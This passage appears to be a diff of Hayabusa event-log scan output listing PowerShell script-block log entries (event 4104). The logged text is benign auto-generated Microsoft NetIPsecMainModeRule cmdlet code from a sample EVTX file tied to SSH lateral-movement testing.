[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 